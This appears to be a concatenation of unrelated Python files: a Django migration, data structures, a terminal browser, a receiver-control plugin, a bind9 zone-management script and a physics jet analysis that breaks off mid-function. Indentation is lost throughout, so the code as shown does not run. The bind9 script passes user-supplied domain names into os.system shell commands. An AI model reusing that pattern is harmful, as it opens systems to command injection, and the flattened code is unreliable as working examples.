# Generated by Django 2.1.9 on 2019-08-05 05:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('whiskydatabase', '0017_auto_20190621_1451'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='rating',
field=models.FloatField(default=0),
),
]
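# For reference, a sketch (assumed here, not taken from the original app) of the model
# state this AlterField migration implies for the Comment model:
#
#   class Comment(models.Model):
#       rating = models.FloatField(default=0)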
|
"""
Queue based on an array
Author: Wenru
"""
from typing import Optional
class ArrayQueue:
def __init__(self, capacity: int):
self._items = []
self._capacity = capacity
self._head = 0
self._tail = 0
def enqueue(self, item: str) -> bool:
if self._tail == self._capacity:
if self._head == 0:
return False
else:
for i in range(0, self._tail - self._head):
self._items[i] = self._items[i + self._head]
self._tail = self._tail - self._head
self._head = 0
self._items.insert(self._tail, item)
self._tail += 1
return True
def dequeue(self) -> Optional[str]:
if self._head != self._tail:
item = self._items[self._head]
self._head += 1
return item
def __repr__(self) -> str:
return " ".join(item for item in self._items[self._head : self._tail])
|
def solution(s):
# Strip the unnecessary characters from the string so each case can be split out
a = s.replace('{{', '')
c = a.replace('}}', '')
d = c.replace(',', ' ')
e = d.split('} {')
# The "no duplicate values" condition is taken as a hint to use sets
# Convert the str values in list e into sets of ints (sets are needed for the - operation)
SetList = [set(map(int, i.split())) for i in e]
SetList.sort(key=len)  # sort by length
answer = []
# The value left after subtracting the set that is one element shorter gives the next number
# {2} > starts with 2
# {2, 1} > {2, 1} - {2} > {1} > then 1
# ...
answer += list(SetList[0])
for i in range(len(SetList) - 1):
answer += list(SetList[i + 1] - SetList[i])
return answer
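# A brief usage sketch (input format assumed from the comments above): the tuple string
# encodes the sequence by set inclusion, so both calls should print [2, 1, 3, 4].
if __name__ == "__main__":
    print(solution("{{2},{2,1},{2,1,3},{2,1,3,4}}"))
    print(solution("{{1,2,3},{2,1},{1,2,4,3},{2}}"))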
|
# -*- coding: iso-8859-1 -*-
import eiscp
import logging
from kalliope.core.NeuronModule import NeuronModule, MissingParameterException
logging.basicConfig()
logger = logging.getLogger("kalliope")
class Onkyo(NeuronModule):
def __init__(self, **kwargs):
super(Onkyo, self).__init__(**kwargs)
# the args from the neuron configuration
self.ip_address = kwargs.get('ip_address', None)
self.volume = kwargs.get('volume', None)
self.command_1 = kwargs.get('command_1', None)
self.command_2 = kwargs.get('command_2', None)
self.command_3 = kwargs.get('command_3', None)
self.command_4 = kwargs.get('command_4', None)
self.command_5 = kwargs.get('command_5', None)
self.command_6 = kwargs.get('command_6', None)
# check if parameters have been provided
if self._is_parameters_ok():
receiver = eiscp.eISCP(self.ip_address)
if self.volume is not None:
try:
receiver.command("volume=%s" % int(self.volume))
receiver.disconnect()
except ValueError:
logger.debug("Attention: Onkyo volume needs to be integer")
if self.command_1 is not None:
receiver.command(self.command_1)
if self.command_2 is not None:
receiver.command(self.command_2)
if self.command_3 is not None:
receiver.command(self.command_3)
if self.command_4 is not None:
receiver.command(self.command_4)
if self.command_5 is not None:
receiver.command(self.command_5)
if self.command_6 is not None:
receiver.command(self.command_6)
receiver.disconnect()
def _is_parameters_ok(self):
"""
Check if received parameters are ok to perform operations in the neuron
:return: true if parameters are ok, raise an exception otherwise
.. raises:: MissingParameterException
"""
if self.ip_address is None:
raise MissingParameterException("You must set the IP address")
return True
|
from html.parser import HTMLParser
import requests
import sys
from colorama import init, Fore, Back, Style
class parse_html(HTMLParser):
def __init__(self):
self.final_brow = "---Dracux Browser--- "
self.print_data = False
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag=='title':
self.final_brow+='*'
self.print_data = True
elif tag=='p':
self.print_data = True
elif tag=='a':
self.final_brow+=Fore.RED+'<'
self.print_data = True
elif tag=='input':
for attr in attrs:
if attr[0]=='type':
if attr[1]=='text':
self.final_brow+=Back.WHITE+'__________________'+Back.BLACK+'\n'
#print(attrs)
def handle_endtag(self, tag):
if tag=='title':
self.final_brow+='*\n\n'
elif tag =='p':
self.final_brow+='\n'
elif tag == 'a':
self.final_brow+='>'+Fore.WHITE
def handle_data(self, data):
if self.print_data == True:
self.final_brow+=data
self.print_data = False
def get_url(self,url):
self.final_brow += Fore.BLUE+url+Fore.WHITE+" "
class browse:
def __init__(self,initial_url):
self.my_url=initial_url
self.r = '<Title>Welcome to my Browser</title>'
self.keep_going = True
def navigate(self):
if self.my_url.upper() == 'Q': #first commands
self.keep_going = False #TODO: this needs an url manager.
else: #Other things
if '.' not in self.my_url:
self.my_url = 'http://www.duckduckgo.com/?q='+self.my_url
elif self.my_url[0:4]!="http":
self.my_url = "http://www."+self.my_url
try:
self.r = requests.get(self.my_url)
except requests.exceptions.RequestException:
print("Site does not exist")
def set_url(self):
self.my_url = input("Url: ")
def get_page(self):
parser = parse_html()
parser.get_url(self.my_url)
try:
parser.feed(self.r.text)
except AttributeError:
# self.r is still the initial placeholder string rather than a requests Response
parser.feed(self.r)
print(parser.final_brow)
self.set_url()
self.navigate()
if __name__ == '__main__':
colors= False
initial_url="http://www.dracux.com"
#managing arguments
if len(sys.argv)>1:
if sys.argv[1].upper()=='C': #C argument starts with color
print("COLOR")
colors=True
elif sys.argv[1]!=None:
initial_url=sys.argv[1]
#end of managing arguments
if colors==False:
use_colors = input("Use colors? Y/N: ")
if use_colors.upper()=="N":
colors = False
print("I will go all in a boring black & white")
else:
colors = True
init()
else:
init()
my_browser = browse(initial_url)
my_browser.navigate()
while my_browser.keep_going:
my_browser.get_page()
|
from .day02 import part1, part2
|
from matplotlib.animation import FuncAnimation
from scipy.ndimage import convolve
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import perl
import sys
def interpolation(noise, screen_size, res_size):
tr = np.sqrt(res_size).astype('int64')
data = noise[:res_size].reshape(tr, tr)
screen = np.random.rand(screen_size, screen_size)
res = convolve(screen, data)
return res
def load_openbci_file(filename, ch_names=None, skiprows=0, max_rows=0):
"""
Load data from an OpenBCI text file and return the selected channels as a NumPy array.
:param filename: path of the file to read, relative to the working directory
:param ch_names: dictionary having all or some channels like this:
{"fp1":1, "fp2":2, "c3":3, "c4":4, "o1":5, "o2":6, "p3":7, "p4":8}
Key specifies the position on the head using the 10-20 standard and
value refers to the channel number on the Cyton BCI board
:return: numpy array containing the first two selected channels (one row per channel)
"""
if ch_names is None:
ch_names = {"fp1":0, "fp2":1, "c3":2, "c4":3, "o1":4, "o2":5, "p3":6, "p4":7}
converter = {i: (float if i < 12 else lambda x: str(x).split(".")[1][:-1])
for i in range(0, 13)}
data = np.loadtxt(filename, comments="%", delimiter=",", converters=converter, usecols=tuple(range(1,3))).T
data = data[list(ch_names.values())[:2]]
return data[:2]
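# Example call (hypothetical file path, assuming the standard OpenBCI/Cyton text format),
# reading only the fp1/fp2 channels:
#
#   fp_data = load_openbci_file("art_data/session01.txt", ch_names={"fp1": 0, "fp2": 1})
#   fp_data.shape   # -> (2, n_samples): one row per selected channel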
def load_art_data(path, pattern):
"""
Load meditation data from all files under the given path that match the pattern.
:param path: directory containing the data files
:param pattern: glob pattern used to select the files
:return: list of numpy arrays, one per matched file
"""
# Specifying files directory, select all the files from there which is txt
datadir = Path(path).glob(pattern)
# Transferring generator into array of file paths
return [load_openbci_file(x) for x in datadir]
def main():
fig = plt.figure()
window_size = 724
datas = load_art_data('art_data', '*14*Meditation*')
datas = np.array(list(map(lambda x: x.mean(axis=0), datas)))
print(datas)
datas = datas[0]
size = 255
datas = np.array([datas[j * size:j * size + size] for j in range(len(datas) // size)])
ax = plt.axes(xlim=(0, window_size), ylim=(0, window_size))
a = np.random.random((window_size, window_size))
im = plt.imshow(a, interpolation='none')
pnf = perl.PerlinNoiseFactory(1, unbias=True)
# initialization function: plot the background of each frame
def init():
im.set_data(np.random.random((window_size, window_size)))
return [im]
# animation function. This is called sequentially
def animate(i):
kernel_size = 225
data = datas[i]
noise = np.array(list(map(lambda x: pnf(x), data)))
res = interpolation(noise, window_size, kernel_size)
im.set_array(res)
return [im]
anim = FuncAnimation(fig, animate, init_func=init,
frames=10000, interval=20, blit=True)
# anim.save('basic_animation.mp4', writer='ffmpeg')
plt.show()
if __name__ == '__main__':
main()
|
s1 = 'Spicy Jalape\u00f1o'
s2 = 'Spicy Jalapen\u0303o'
print(s1)
print(s2)
print(s1 == s2)
print(len(s1))
print(len(s2))
import unicodedata
t1 = unicodedata.normalize('NFC', s1)
t2 = unicodedata.normalize('NFC', s2)
print(t1 == t2)
t3 = unicodedata.normalize('NFD', s1)
t4 = unicodedata.normalize('NFD', s2)
print(t3 == t4)
s = '\ufb01'
print(s)
print(unicodedata.normalize('NFD', s))
print(unicodedata.normalize('NFKD', s))
print(unicodedata.normalize('NFKC', s))
t1 = unicodedata.normalize('NFD', s1)
print(''.join(c for c in t1 if not unicodedata.combining(c)))
|
import math
import unittest
import katas.kyu_7.radians_to_degrees
class RadiansToDegreesTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(math.degrees(math.pi), 180.0)  # compare numerically; the original compared a float to the string '180deg'
def test_equals_2(self):
self.assertAlmostEqual(math.radians(180), 3.14, places=2)  # compare numerically; the original compared a float to the string '3.14rad'
|
import random
random.seed()
class Tournament(object):
""" The crossover function requires two parents to be selected from the population pool. The Tournament class is used to do this.
Two individuals are selected from the population pool and a random number in [0, 1] is chosen. If this number is less than the 'selection rate' (e.g. 0.85), then the fitter individual is selected; otherwise, the weaker one is selected.
"""
def __init__(self):
return
def compete(self, candidates):
""" Pick 2 random candidates from the population and get them to compete against each other. """
c1 = candidates[random.randint(0, len(candidates) - 1)]
c2 = candidates[random.randint(0, len(candidates) - 1)]
f1 = c1.fitness
f2 = c2.fitness
# Find the fittest and the weakest.
if (f1 > f2):
fittest = c1
weakest = c2
else:
fittest = c2
weakest = c1
# selection_rate = 0.85
selection_rate = 0.80
r = random.uniform(0, 1)
if (r < selection_rate):
return fittest
else:
return weakest
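# A minimal usage sketch (not from the original module): compete() only needs objects
# with a .fitness attribute, so "Candidate" below is a hypothetical stand-in.
if __name__ == "__main__":
    class Candidate(object):
        def __init__(self, fitness):
            self.fitness = fitness
    population = [Candidate(f) for f in (0.2, 0.5, 0.9, 0.7)]
    tournament = Tournament()
    parent1 = tournament.compete(population)
    parent2 = tournament.compete(population)
    print(parent1.fitness, parent2.fitness)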
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os, sys, time
from datetime import date
from optparse import OptionParser, Option
# Complete hack.
Option.ALWAYS_TYPED_ACTIONS += ('callback',)
CONFIG = '/etc/bind/named.conf.slave'
#CONFIG = './named.conf.slave'
NOW = date.today()
DOMAINS_FOLDER = '/etc/bind/slave/'
MASTER_NS = '194.105.194.141'
def hlp():
print('''Usage: [function] [parameters]
[function]
-add domain - to add domain in bind9
-mass filename - to add domains from filename
Examples:
add-domain-name.py -add pixelon.ru
add-domain-name.py -mass filename
''')
def exist(domain):
if os.path.isfile(DOMAINS_FOLDER + domain): return True
else: return False
def add(option, opt_str, domain, parser):
for line in open(CONFIG):
if domain in line:
print('Domain ' + domain + ' already in config')
return False
if exist(domain):
print('Domain ' + domain + ' already added')
return False
add_block = '''
zone "''' + domain + '''" IN {
type slave;
file "''' + DOMAINS_FOLDER + domain + '''";
masters { ''' + MASTER_NS + '''; };
};'''
s = str(add_block)
f = open(CONFIG, 'a')
f.write(s)
print('Domain ' + domain + ' added')
def domdelete(option, opt_str, domain, parser):
os.system('cp '+CONFIG+' '+CONFIG+'.'+str(NOW))
domfile = open(CONFIG+'.'+str(NOW), "r")
start = -1
f = open(CONFIG, 'w')
for line in domfile:
if (line.replace('\n','',) == 'zone "' + domain + '" IN {'):
start = 0
if start>=0:
start = start + 1
else:
f.write(line)
if start > 5:
start = -1
if not exist(domain):
print('Domain file ' + domain + ' not found')
else:
os.system("unlink "+DOMAINS_FOLDER + domain)
print('Domain ' + domain + ' deleted')
if start>=0:
if not exist(domain):
print('Domain file ' + domain + ' not found')
else:
os.system("unlink "+DOMAINS_FOLDER + domain)
print('Domain ' + domain + ' deleted')
domfile.close()
f.close()
def add_mass(option, opt_str, filename, parser):
for domain in open(filename):
add('','',domain.replace('\n','',),'')
def delete_mass(option, opt_str, filename, parser):
for domain in open(filename):
domdelete('','',domain.replace('\n','',),'')
def main():
# domain = string(options.domain) if options.domain else None
# print(options)
# keys = sorted(options.keys())
# for opk in options:
# if(options[opk]):
# print opk + ' = '
#else:
# hlp()
#os.system('rndc reload')
global options
global args
p = OptionParser(usage="Usage: %prog [options] [file|domain]", version="%prog 0.2")
p.add_option('-a','--add',action='callback',dest='domain', type='string', callback=add,
help='Domain to add')
p.add_option('-m','--mass',action='callback',dest='filename', type='string', callback=add_mass,
help='File to mass add domains')
p.add_option('-d','--delete',action='callback', dest='domain', type='string', callback=domdelete,
help='Domain to delete')
p.add_option('-n','--massdel',action='callback', dest='filename', type='string', callback=delete_mass,
help='File to mass delete')
(options, args) = p.parse_args()
os.system('rndc reload')
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
"""
Analysis class to read a ROOT TTree of MC track information,
do jet finding, and save response histograms.
Author: James Mulligan (james.mulligan@berkeley.edu)
"""
from __future__ import print_function
# General
import os
import sys
import argparse
import time
# Data analysis and plotting
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
import seaborn as sns
from array import *
import ROOT
import yaml
# Fastjet via python (from heppy)
import fastjet as fj
import fjcontrib
import fjtools
# Analysis utilities
from pyjetty.alice_analysis.process.base import process_io
from pyjetty.alice_analysis.process.base import process_io_emb
from pyjetty.alice_analysis.process.base import jet_info
from pyjetty.alice_analysis.process.base import process_base
from pyjetty.alice_analysis.process.base import thermal_generator
from pyjetty.mputils import CEventSubtractor
from pyjetty.mputils import RTreeWriter
# Prevent ROOT from stealing focus when plotting
ROOT.gROOT.SetBatch(True)
################################################################
class ProcessGroomers(process_base.ProcessBase):
#---------------------------------------------------------------
# Constructor
#---------------------------------------------------------------
def __init__(self, input_file='', config_file='', output_dir='', debug_level=0, **kwargs):
super(ProcessGroomers, self).__init__(input_file, config_file, output_dir, debug_level, **kwargs)
# Initialize configuration
self.initialize_config()
#---------------------------------------------------------------
# Main processing function
#---------------------------------------------------------------
def process_groomers(self):
self.start_time = time.time()
# ------------------------------------------------------------------------
# Use IO helper class to convert truth-level ROOT TTree into
# a SeriesGroupBy object of fastjet particles per event
tree_dir = 'PWGHF_TreeCreator'
io_truth = process_io.ProcessIO(input_file=self.input_file, tree_dir=tree_dir,
track_tree_name='tree_Particle_gen', use_ev_id_ext=self.use_ev_id_ext)
self.df_fjparticles = io_truth.load_data()
self.nEvents = len(self.df_fjparticles.index)
self.nTracks = len(io_truth.track_df.index)
print('--- {} seconds ---'.format(time.time() - self.start_time))
# ------------------------------------------------------------------------
# Set up the Pb-Pb embedding object
if not self.thermal_model:
self.process_io_emb = process_io_emb.ProcessIO_Emb(self.emb_file_list,
track_tree_name='tree_Particle_gen', is_pp = True,
use_ev_id_ext = self.use_ev_id_ext, remove_used_file=False)
# ------------------------------------------------------------------------
# Initialize histograms
self.initialize_output_objects()
# Create constituent subtractor, if configured
if self.do_constituent_subtraction:
self.constituent_subtractor = [CEventSubtractor(max_distance=R_max, alpha=self.alpha, max_eta=self.eta_max, bge_rho_grid_size=self.bge_rho_grid_size, max_pt_correct=self.max_pt_correct, ghost_area=self.ghost_area, distance_type=fjcontrib.ConstituentSubtractor.deltaR) for R_max in self.max_distance]
print(self)
# Find jets and fill histograms
print('Find jets...')
self.analyzeEvents()
# Plot histograms
print('Save histograms...')
process_base.ProcessBase.save_output_objects(self)
print('--- {} seconds ---'.format(time.time() - self.start_time))
#---------------------------------------------------------------
# Initialize config file into class members
#---------------------------------------------------------------
def initialize_config(self):
# Call base class initialization
process_base.ProcessBase.initialize_config(self)
# Read config file
with open(self.config_file, 'r') as stream:
config = yaml.safe_load(stream)
self.jet_matching_distance = config['jet_matching_distance']
self.mc_fraction_threshold = config['mc_fraction_threshold']
self.prong_matching_threshold = config['prong_matching_threshold']
self.use_ev_id_ext = config['use_ev_id_ext']
self.main_R_max = config['constituent_subtractor']['main_R_max']
self.eta_max = config['eta_max']
self.plot_diagram = config['plot_diagram']
if 'thermal_model' in config:
self.min_background_multiplicity = None
self.thermal_model = True
beta = config['thermal_model']['beta']
N_avg = config['thermal_model']['N_avg']
sigma_N = config['thermal_model']['sigma_N']
self.thermal_generator = thermal_generator.ThermalGenerator(N_avg = N_avg, sigma_N = sigma_N,
beta = beta, eta_max=self.eta_max)
else:
self.thermal_model = False
self.min_background_multiplicity = config['angantyr']['min_background_multiplicity']
self.emb_file_list = config['angantyr']['emb_file_list']
self.observable_list = config['process_observables']
# Create dictionaries to store grooming settings and observable settings for each observable
# Each dictionary entry stores a list of subconfiguration parameters
# The observable list stores the observable setting, e.g. subjetR
# The grooming list stores a list of SD or DG settings {'sd': [zcut, beta]} or {'dg': [a]}
self.obs_settings = {}
self.obs_grooming_settings = {}
for observable in self.observable_list:
# Fill observable settings
self.obs_settings[observable] = []
obs_config_dict = config[observable]
obs_subconfig_list = [name for name in list(obs_config_dict.keys()) if 'config' in name]
self.obs_settings[observable] = self.utils.obs_settings(observable, obs_config_dict, obs_subconfig_list)
if observable == 'subjet_z':
self.subjet_def = {}
for subjetR in self.obs_settings[observable]:
self.subjet_def[subjetR] = fj.JetDefinition(fj.antikt_algorithm, subjetR)
# Fill grooming settings
self.obs_grooming_settings[observable] = self.utils.grooming_settings(obs_config_dict)
# Construct set of unique grooming settings
self.grooming_settings = []
lists_grooming = [self.obs_grooming_settings[obs] for obs in self.observable_list]
for observable in lists_grooming:
for setting in observable:
if setting not in self.grooming_settings and setting != None:
self.grooming_settings.append(setting)
# Set reclustering algorithm
self.recluster_alg = config['reclustering_algorithm']
if self.recluster_alg == 'CA':
self.reclustering_algorithm = fj.cambridge_algorithm
elif self.recluster_alg == 'KT':
self.reclustering_algorithm = fj.kt_algorithm
elif self.recluster_alg == 'AKT':
self.reclustering_algorithm = fj.antikt_algorithm
#---------------------------------------------------------------
# Initialize histograms
#---------------------------------------------------------------
def initialize_output_objects(self):
self.hNevents = ROOT.TH1F('hNevents', 'hNevents', 2, -0.5, 1.5)
if self.event_number_max < self.nEvents:
self.hNevents.Fill(1, self.event_number_max)
else:
self.hNevents.Fill(1, self.nEvents)
self.hRho = ROOT.TH1F('hRho', 'hRho', 1000, 0., 1000.)
self.hMult = ROOT.TH1F('hMult', 'hMult', 100, 0., 20000.)
#---------------------------------------------------------------
# Initialize histograms
#---------------------------------------------------------------
def initialize_output_objects_R(self, jetR):
for R_max in self.max_distance:
name = 'hDeltaPt_emb_R{}_Rmax{}'.format(jetR, R_max)
h = ROOT.TH2F(name, name, 300, 0, 300, 400, -200., 200.)
setattr(self, name, h)
name = 'hDeltaR_R{}_Rmax{}'.format(jetR, R_max)
h = ROOT.TH2F(name, name, 300, 0, 300, 100, 0., 2.)
setattr(self, name, h)
if 'subjet_z' in self.observable_list:
for subjetR in self.obs_settings['subjet_z']:
name = 'hDeltaR_{}_R{}_{}_Rmax{}'.format('subjet_z', jetR, subjetR, R_max)
h = ROOT.TH2F(name, name, 300, 0, 300, 100, 0., 2.)
setattr(self, name, h)
# Construct THn for each groomer: (pt, zg, theta_g, tag flag)
for grooming_setting in self.obs_grooming_settings['theta_g']:
if grooming_setting:
grooming_label = self.utils.grooming_label(grooming_setting)
for R_max in self.max_distance:
# THn for combined jets
dim = 4
title = ['p_{T,ch jet}', '#it{z}_{g,ch}', '#theta_{g,ch}', 'flag']
nbins = [30, 50, 100, 9]
min = [0., 0., 0., 0.5]
max = [300., 0.5, 1., 9.5]
name = 'h_theta_g_zg_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
self.create_thn(name, title, dim, nbins, min, max)
# TH3 for truth jets
name = 'h_theta_g_zg_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
h = ROOT.TH3F(name, name, 30, 0, 300, 50, 0, 0.5, 100, 0, 1.0)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle('#it{z}_{g,ch}')
h.GetZaxis().SetTitle('#theta_{g,ch}')
setattr(self, name, h)
for observable in self.observable_list:
if observable in ['kappa', 'tf']:
if observable == 'kappa':
label = '#kappa_{ch}'
if observable == 'tf':
label = '#it{t}_{f}'
for grooming_setting in self.obs_grooming_settings[observable]:
if grooming_setting:
grooming_label = self.utils.grooming_label(grooming_setting)
# TH3 for combined jets
for R_max in self.max_distance:
name = 'h_{}_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 50, 0, 0.5, 9, 0.5, 9.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('flag')
setattr(self, name, h)
# TH2 for truth jets
name = 'h_{}_JetPt_Truth_R{}_{}'.format(observable, jetR, grooming_label)
h = ROOT.TH2F(name, name, 30, 0, 300, 50, 0, 0.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
setattr(self, name, h)
if observable == 'subjet_z':
for obs_setting in self.obs_settings[observable]:
for R_max in self.max_distance:
label = '#it{z}'
name = 'h_{}_fraction_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('Prong matching fraction')
setattr(self, name, h)
name = 'h_{}_flag_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 9, 0.5, 9.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('flag')
setattr(self, name, h)
label = '#it{z}_{leading}'
name = 'h_{}_fraction_leading_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('Prong matching fraction')
setattr(self, name, h)
name = 'h_{}_flag_leading_JetPt_R{}_{}_Rmax{}'.format(observable, jetR, obs_setting, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 100, 0, 1.0, 9, 0.5, 9.5)
h.GetXaxis().SetTitle('p_{T,ch jet}')
h.GetYaxis().SetTitle(label)
h.GetZaxis().SetTitle('flag')
setattr(self, name, h)
# Create prong matching histograms
for grooming_setting in self.obs_grooming_settings['theta_g']:
if grooming_setting:
grooming_label = self.utils.grooming_label(grooming_setting)
self.create_prong_matching_histograms(jetR, grooming_label)
# Create tree to store splitting info for all groomers
self.fill_tree = False
if self.fill_tree:
self.t = ROOT.TTree('t', 't')
self.tw = RTreeWriter(tree=self.t)
#---------------------------------------------------------------
# Create theta_g response histograms
#---------------------------------------------------------------
def create_prong_matching_histograms(self, jetR, grooming_label):
prong_list = ['leading', 'subleading']
match_list = ['leading', 'subleading', 'ungroomed', 'outside']
for R_max in self.max_distance:
for prong in prong_list:
for match in match_list:
name = 'hProngMatching_{}_{}_JetPt_R{}_{}_Rmax{}'.format(prong, match, jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 15, -0.4, 1.1, 100, 0., 1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction')
h.GetZaxis().SetTitle('#Delta R_{prong}/R_{g}')
setattr(self, name, h)
name = 'hProngMatching_{}_{}_JetPtZ_R{}_{}_Rmax{}'.format(prong, match, jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 15, -0.4, 1.1, 200, -0.5, 0.5)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction')
h.GetZaxis().SetTitle('#Delta z_{prong}/z')
setattr(self, name, h)
name = 'hProngMatching_subleading-leading_correlation_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
h = ROOT.TH3F(name, name, 30, 0, 300, 15, -0.4, 1.1, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction, leading_subleading')
h.GetZaxis().SetTitle('Prong matching fraction, subleading_leading')
setattr(self, name, h)
name = 'hProngMatching_truth_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
h = ROOT.TH2F(name, name, 30, 0, 300, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction, truth_groomed')
setattr(self, name, h)
name = 'hProngMatching_truth2_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
h = ROOT.TH2F(name, name, 30, 0, 300, 15, -0.4, 1.1)
h.GetXaxis().SetTitle('p_{T,truth}')
h.GetYaxis().SetTitle('Prong matching fraction, truth2_groomed')
setattr(self, name, h)
#---------------------------------------------------------------
# Main function to loop through and analyze events
#---------------------------------------------------------------
def analyzeEvents(self):
fj.ClusterSequence.print_banner()
print()
self.event_number = 0
for jetR in self.jetR_list:
self.initialize_output_objects_R(jetR)
# Then can use list comprehension to iterate over the groupby and do jet-finding
# simultaneously for fj_1 and fj_2 per event, so that I can match jets -- and fill histograms
result = [self.analyze_event(fj_particles) for fj_particles in self.df_fjparticles]
print('Save thn...')
process_base.ProcessBase.save_thn_th3_objects(self)
#---------------------------------------------------------------
# Analyze jets of a given event.
# fj_particles is the list of fastjet pseudojets for a single fixed event.
#---------------------------------------------------------------
def analyze_event(self, fj_particles_truth):
self.event_number += 1
if self.event_number > self.event_number_max:
return
if self.debug_level > 1:
print('-------------------------------------------------')
print('event {}'.format(self.event_number))
# Check that the entries exist appropriately
# (need to check how this can happen -- but it is only a tiny fraction of events)
if type(fj_particles_truth) != fj.vectorPJ:
print('fj_particles type mismatch -- skipping event')
return
if len(fj_particles_truth) > 1:
if np.abs(fj_particles_truth[0].pt() - fj_particles_truth[1].pt()) < 1e-5:
print('WARNING: Duplicate particles may be present')
print([p.user_index() for p in fj_particles_truth])
print([p.pt() for p in fj_particles_truth])
# Clear event in tree
if self.fill_tree:
self.tw.clear()
# If Pb-Pb, construct embedded event (do this once, for all jetR)
# If thermal model, generate a thermal event
if self.thermal_model:
fj_particles_combined_beforeCS = self.thermal_generator.load_event()
# Angantyr: Get Pb-Pb event
else:
accept_background_event = False
while not accept_background_event:
fj_particles_combined_beforeCS = self.process_io_emb.load_event()
particles = [p.eta() for p in fj_particles_combined_beforeCS]
multiplicity = sum(np.abs(i) < 0.9 for i in particles)
if multiplicity > self.min_background_multiplicity:
accept_background_event = True
self.hMult.Fill(multiplicity)
if self.debug_level > 3:
print('multiplicity: {}'.format(multiplicity))
print('accepted: {}'.format(accept_background_event))
# Form the combined event
# The pp-truth tracks are each stored with a unique user_index >= 0
# (same index in fj_particles_combined and fj_particles_truth -- which will be used in prong-matching)
# The Pb-Pb tracks are each stored with a unique user_index < 0
[fj_particles_combined_beforeCS.push_back(p) for p in fj_particles_truth]
# Perform constituent subtraction for each R_max
fj_particles_combined = [self.constituent_subtractor[i].process_event(fj_particles_combined_beforeCS) for i, R_max in enumerate(self.max_distance)]
if self.debug_level > 3:
print([p.user_index() for p in fj_particles_truth])
print([p.pt() for p in fj_particles_truth])
print([p.user_index() for p in fj_particles_combined[0]])
print([p.pt() for p in fj_particles_combined[0]])
print([p.user_index() for p in fj_particles_combined_beforeCS])
print([p.pt() for p in fj_particles_combined_beforeCS])
# Loop through jetR, and process event for each R
for jetR in self.jetR_list:
# Keep track of whether to fill R-independent histograms
self.fill_R_indep_hists = (jetR == self.jetR_list[0])
# Set jet definition and a jet selector
jet_def = fj.JetDefinition(fj.antikt_algorithm, jetR)
jet_selector_det = fj.SelectorPtMin(5.0) & fj.SelectorAbsRapMax(self.eta_max - jetR)
jet_selector_truth_matched = fj.SelectorPtMin(5.0) & fj.SelectorAbsRapMax(self.eta_max)
if self.debug_level > 2:
print('')
print('jet definition is:', jet_def)
print('jet selector for det-level is:', jet_selector_det)
print('jet selector for truth-level matches is:', jet_selector_truth_matched)
# Analyze
for i, R_max in enumerate(self.max_distance):
if self.debug_level > 1:
print('')
print('R_max: {}'.format(R_max))
print('Total number of combined particles: {}'.format(len([p.pt() for p in fj_particles_combined_beforeCS])))
print('After constituent subtraction {}: {}'.format(i, len([p.pt() for p in fj_particles_combined[i]])))
# Keep track of whether to fill R_max-independent histograms
self.fill_Rmax_indep_hists = (i == 0)
# Perform constituent subtraction on det-level, if applicable
rho = self.constituent_subtractor[i].bge_rho.rho()
if self.fill_R_indep_hists and self.fill_Rmax_indep_hists:
getattr(self, 'hRho').Fill(rho)
# Do jet finding (re-do each time, to make sure matching info gets reset)
cs_truth = fj.ClusterSequence(fj_particles_truth, jet_def)
jets_truth = fj.sorted_by_pt(cs_truth.inclusive_jets())
jets_truth_selected = jet_selector_det(jets_truth)
jets_truth_selected_matched = jet_selector_truth_matched(jets_truth)
cs_combined = fj.ClusterSequence(fj_particles_combined[i], jet_def)
jets_combined = fj.sorted_by_pt(cs_combined.inclusive_jets())
jets_combined_selected = jet_selector_det(jets_combined)
self.analyze_jets(jets_combined_selected, jets_truth_selected, jets_truth_selected_matched,
jetR, R_max = R_max)
if self.fill_tree:
self.tw.fill_tree()
#---------------------------------------------------------------
# Analyze jets of a given event.
#---------------------------------------------------------------
def analyze_jets(self, jets_combined_selected, jets_truth_selected,
jets_truth_selected_matched, jetR, R_max = None):
